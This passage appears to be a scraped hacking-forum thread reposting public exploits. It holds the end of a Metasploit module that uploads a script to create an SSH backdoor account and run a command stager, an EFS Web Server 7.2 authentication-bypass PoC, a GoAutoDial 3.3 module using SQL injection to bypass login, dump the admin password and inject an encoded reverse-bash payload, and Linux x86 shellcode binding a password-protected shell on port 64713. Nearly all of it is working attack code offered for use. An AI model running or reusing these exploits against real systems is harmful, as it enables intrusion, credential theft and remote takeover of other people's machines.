sf_action_id fail_with(Failure::Unknown, 'Unable to obtain sf_action_id from rulesimport.cgi') end sf_action_id end def create_ssh_backdoor(sid, user, pass) uri = normalize_uri(target_uri.path, 'DetectionPolicy/rules/rulesimport.cgi') sf_action_id = get_sf_action_id(sid) sh_name = 'exploit.sh' print_status("Attempting to create an SSH backdoor as #{user}:#{pass}") mime_data = Rex::MIME::Message.new mime_data.add_part('Import', nil, nil, 'form-data; name="action_submit"') mime_data.add_part('file', nil, nil, 'form-data; name="source"') mime_data.add_part('1', nil, nil, 'form-data; name="manual_update"') mime_data.add_part(sf_action_id, nil, nil, 'form-data; name="sf_action_id"') mime_data.add_part( "sudo useradd -g ldapgroup -p `openssl passwd -1 #{pass}` #{user}; rm /var/sf/SRU/#{sh_name}", 'application/octet-stream', nil, "form-data; name=\"file\"; filename=\"#{sh_name}\"" ) send_request_cgi({ 'method' => 'POST', 'uri' => uri, 'cookie' => "CGISESSID=#{sid}", 'ctype' => "multipart/form-data; boundary=#{mime_data.bound}", 'data' => mime_data.to_s, 'vars_get' => { 'no_mojo' => '1' }, }) end def generate_new_username datastore['NEWSSHUSER'] || Rex::Text.rand_text_alpha(5) end def generate_new_password datastore['NEWSSHPASS'] || Rex::Text.rand_text_alpha(5) end def report_cred(opts) service_data = { address: rhost, port: rport, service_name: 'cisco', protocol: 'tcp', workspace_id: myworkspace_id } credential_data = { origin_type: :service, module_fullname: fullname, username: opts[:user], private_data: opts[:password], private_type: :password }.merge(service_data) login_data = { last_attempted_at: DateTime.now, core: create_credential(credential_data), status: Metasploit::Model::Login::Status::SUCCESSFUL, proof: opts[:proof] }.merge(service_data) create_credential_login(login_data) end def do_login console_user = datastore['USERNAME'] console_pass = datastore['PASSWORD'] uri = normalize_uri(target_uri.path, 'login.cgi') print_status("Attempting to login in as #{console_user}:#{console_pass}") res = send_request_cgi({ 'method' => 'POST', 'uri' => uri, 'vars_post' => { 'username' => console_user, 'password' => console_pass, 'target' => '' } }) unless res fail_with(Failure::Unknown, 'Connection timed out while trying to log in.') end res_cookie = res.get_cookies if res.code == 302 && res_cookie.include?('CGISESSID') cgi_sid = res_cookie.scan(/CGISESSID=(\w+);/).flatten.first print_status("CGI Session ID: #{cgi_sid}") print_good("Authenticated as #{console_user}:#{console_pass}") report_cred(username: console_user, password: console_pass) return cgi_sid end nil end def execute_command(cmd, opts = {}) @first_exec = true cmd.gsub!(/\/tmp/, '/usr/tmp') # Weird hack for the cmd stager. # Because it keeps using > to write the payload. if @first_exec @first_exec = false else cmd.gsub!(/>>/, ' > ') end begin Timeout.timeout(3) do @ssh_socket.exec!("#{cmd}\n") vprint_status("Executing #{cmd}") end rescue Timeout::Error fail_with(Failure::Unknown, 'SSH command timed out') rescue Net::SSH::ChannelOpenFailed print_status('Trying again due to Net::SSH::ChannelOpenFailed (sometimes this happens)') retry end end def init_ssh_session(user, pass) print_status("Attempting to log into SSH as #{user}:#{pass}") factory = ssh_socket_factory opts = { auth_methods: ['password', 'keyboard-interactive'], port: datastore['SSHPORT'], use_agent: false, config: false, password: pass, proxy: factory, non_interactive: true } opts.merge!(verbose: :debug) if datastore['SSH_DEBUG'] begin ssh = nil ::Timeout.timeout(datastore['SSH_TIMEOUT']) do @ssh_socket = Net::SSH.start(rhost, user, opts) end rescue Net::SSH::Exception => e fail_with(Failure::Unknown, e.message) end end def exploit # To exploit the useradd vuln, we need to login first. sid = do_login return unless sid # After login, we can call the useradd utility to create a backdoor user new_user = generate_new_username new_pass = generate_new_password create_ssh_backdoor(sid, new_user, new_pass) # Log into the SSH backdoor account init_ssh_session(new_user, new_pass) begin execute_cmdstager({:linemax => 500}) ensure @ssh_socket.close end end end
  19. Moeein Seven

    Hacking

    # Exploit Title: EFS Web Server 7.2 Authentication Bypass # Date: 11-06-2017 # Software Link: http://www.sharing-file.com/efssetup.exe # Software Version : 7.2 # Exploit Author: Touhid M.Shaikh # Contact: http://twitter.com/touhidshaikh22 # Website: http://touhidshaikh.com/ ######## Description ######## <!-- What is Easy File Sharing Web Server 7.2 ? Easy File Sharing Web Server is a file sharing software that allows visitors to upload/download files easily through a Web Browser. It can help you share files with your friends and colleagues. They can download files from your computer or upload files from theirs.They will not be required to install this software or any other software because an internet browser is enough. Easy File Sharing Web Server also provides a Bulletin Board System (Forum). It allows remote users to post messages and files to the forum. The Secure Edition adds support for SSL encryption that helps protect businesses against site spoofing and data corruption. --> ######## Video PoC and Article ######## https://www.youtube.com/watch?v=XlTH7Fm1m1w http://touhidshaikh.com/blog/poc/EFSwebservr-authbypass/ ######## Attact Description ######## <!-- Note: No Need to Login...bcz this is auth bypass vulnerability .hehehe. ==>START<== Any visitor.. We can Bypass the Login Screen by just Change the URL and Browse the Drives. bingoo... --> ######## Proof of Concept ######## When we visit the EFS web server its prompt for login, now attacker just change url to below. Exploit.... http://192.168.1.14/disk_c/ in this case change drvie by just change /disk_c to /disk_<Drive latter> example. /disk_d , /disk_f etc ============================================= NOTE :: :: Now We have Permission to View Drives and Folder and Download Files. in Diffrent Drives or folder. ============================================
  20. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => "GoAutoDial 3.3 Authentication Bypass / Command Injection", 'Description' => %q{ This module exploits a SQL injection flaw in the login functionality for GoAutoDial version 3.3-1406088000 and below, and attempts to perform command injection. This also attempts to retrieve the admin user details, including the cleartext password stored in the underlying database. Command injection will be performed with root privileges. The default pre-packaged ISO builds are available from goautodial.org. Currently, the hardcoded command injection payload is an encoded reverse-tcp bash one-liner and the handler should be setup to receive it appropriately. }, 'License' => MSF_LICENSE, 'Author' => [ 'Chris McCurley', # Discovery & Metasploit module ], 'References' => [ ['CVE', '2015-2843'], ['CVE', '2015-2845'] ], 'Platform' => %w{unix}, 'Arch' => ARCH_CMD, 'Targets' => [ ['Automatic', {} ] ], 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }, 'DefaultTarget' => 0, 'Privileged' => false, 'DisclosureDate' => 'Apr 21 2015')) register_options( [ OptPort.new('RPORT', [true, 'The target port', 443]), OptBool.new('SSL', [false, 'Use SSL', true]), OptString.new('TARGETURI', [true, 'The base path', '/']) ]) end def check res = check_version() if res and res.body =~ /1421902800/ return Exploit::CheckCode::Safe else return Exploit::CheckCode::Vulnerable end end def check_version() uri = target_uri.path send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, 'changelog.txt'), 'headers' => { 'User-Agent' => 'Mozilla/5.0', 'Accept-Encoding' => 'identity' } }) end def sqli_auth_bypass() uri = target_uri.path send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, 'index.php', 'go_login', 'validate_credentials'), 'headers' => { 'User-Agent' => 'Mozilla/5.0', 'Accept-Encoding' => 'identity' }, 'vars_post' => { 'user_name' => 'admin', 'user_pass' => '\'%20or%20\'1\'%3D\'1' } }) end def sqli_admin_pass(cookies) uri = target_uri.path send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, 'index.php', 'go_site', 'go_get_user_info', '\'%20OR%20active=\'Y'), 'headers' => { 'User-Agent' => 'Mozilla/5.0', 'Accept-Encoding' => 'identity', 'Cookie' => cookies } }) end # # Run the actual exploit # def execute_command() encoded = Rex::Text.encode_base64("#{payload.encoded}") params = "||%20bash%20-c%20\"eval%20`echo%20-n%20" + encoded + "%20|%20base64%20--decode`\"" uri = target_uri.path send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, 'index.php', 'go_site', 'cpanel', params), 'headers' => { 'User-Agent' => 'Mozilla/5.0', 'Accept-Encoding' => 'identity', 'Cookie' => @cookie } }) end def exploit() print_status("#{rhost}:#{rport} - Trying SQL injection...") res1 = sqli_auth_bypass() if res1 && res1.code == 200 print_good('Authentication Bypass (SQLi) was successful') else print_error('Error: Run \'check\' command to identify whether the auth bypass has been fixed') end @cookie = res1.get_cookies print_status("#{rhost}:#{rport} - Dumping admin password...") res = sqli_admin_pass(@cookie) if res print_good(res.body) else print_error('Error: No creds returned, possible mitigations are in place.') end print_status("#{rhost}:#{rport} - Sending payload...waiting for connection") execute_command() end end
  21. /* * linux-x86-authportbind.c - AUTH portbind shellcode 166 bytes for Linux/x86 * Copyright (c) 2006 Gotfault Security <xgc@gotfault.net> * * portbind shellcode that bind()'s a shell on port 64713/tcp * and requests a user password. * */ char shellcode[] = /* socket(AF_INET, SOCK_STREAM, 0) */ "\x6a\x66" // push $0x66 "\x58" // pop %eax "\x6a\x01" // push $0x1 "\x5b" // pop %ebx "\x99" // cltd "\x52" // push %edx "\x53" // push %ebx "\x6a\x02" // push $0x2 "\x89\xe1" // mov %esp,%ecx "\xcd\x80" // int $0x80 /* bind(s, server, sizeof(server)) */ "\x52" // push %edx "\x66\x68\xfc\xc9" // pushw $0xc9fc // PORT = 64713 "\x66\x6a\x02" // pushw $0x2 "\x89\xe1" // mov $esp,%ecx "\x6a\x10" // push $0x10 "\x51" // push %ecx "\x50" // push %eax "\x89\xe1" // mov %esp,%ecx "\x89\xc6" // mov %eax,%esi "\x43" // inc %ebx "\xb0\x66" // mov $0x66,%al "\xcd\x80" // int $0x80 /* listen(s, anything) */ "\xb0\x66" // mov $0x66,%al "\xd1\xe3" // shl %ebx "\xcd\x80" // int $0x80 /* accept(s, 0, 0) */ "\x52" // push %edx "\x52" // push %edx "\x56" // push %esi "\x89\xe1" // mov %esp,%ecx "\x43" // inc %ebx "\xb0\x66" // mov $0x66,%al "\xcd\x80" // int $0x80 "\x96" // xchg %eax,%esi /* send(s, "Password: ", 0x0a, flags) */ "\x52" // push %edx "\x68\x72\x64\x3a\x20" // push $0x203a6472 "\x68\x73\x73\x77\x6f" // push $0x6f777373 "\x66\x68\x50\x61" // pushw $0x6150 "\x89\xe7" // mov $esp,%edi "\x6a\x0a" // push $0xa "\x57" // push %edi "\x56" // push %esi "\x89\xe1" // mov %esp,%ecx "\xb3\x09" // mov $0x9,%bl "\xb0\x66" // mov $0x66,%al "\xcd\x80" // int $0x80 /* recv(s, *buf, 0x08, flags) */ "\x52" // push %edx "\x6a\x08" // push $0x8 "\x8d\x4c\x24\x08" // lea 0x8(%esp),%ecx "\x51" // push %ecx "\x56" // push %esi "\x89\xe1" // mov %esp,%ecx "\xb3\x0a" // mov $0xa,%bl "\xb0\x66" // mov $0x66,%al "\xcd\x80" // int $0x80 "\x87\xf3" // xchg %esi,%ebx /* like: strncmp(string1, string2, 0x8) */ "\x52" // push %edx "\x68\x61\x75\x6c\x74" // push $0x746c7561 // password "\x68\x67\x6f\x74\x66" // push $0x66746f67 // here "\x89\xe7" // mov %esp,%edi "\x8d\x74\x24\x1c" // lea 0x1c(%esp),%esi "\x89\xd1" // mov %edx,%ecx "\x80\xc1\x08" // add $0x8,%cl "\xfc" // cld "\xf3\xa6" // repz cmpsb %es:(%edi),%ds:(%esi) "\x74\x04" // je dup /* exit(something) */ "\xf7\xf0" // div %eax "\xcd\x80" // int $0x80 /* dup2(c, 2) , dup2(c, 1) , dup2(c, 0) */ "\x6a\x02" // push $0x2 "\x59" // pop %ecx "\xb0\x3f" // mov $0x3f,%al "\xcd\x80" // int $0x80 "\x49" // dec %ecx "\x79\xf9" // jns dup_loop /* execve("/bin/sh", ["/bin/sh"], NULL) */ "\x6a\x0b" // push $0xb "\x58" // pop %eax "\x52" // push %edx "\x68\x2f\x2f\x73\x68" // push $0x68732f2f "\x68\x2f\x62\x69\x6e" // push $0x6e69622f "\x89\xe3" // mov %esp, %ebx "\x52" // push %edx "\x53" // push %ebx "\x89\xe1" // mov %esp, %ecx "\xcd\x80"; // int $0x80 int main() { int (*f)() = (int(*)())shellcode; printf("Length: %u\n", strlen(shellcode)); f(); }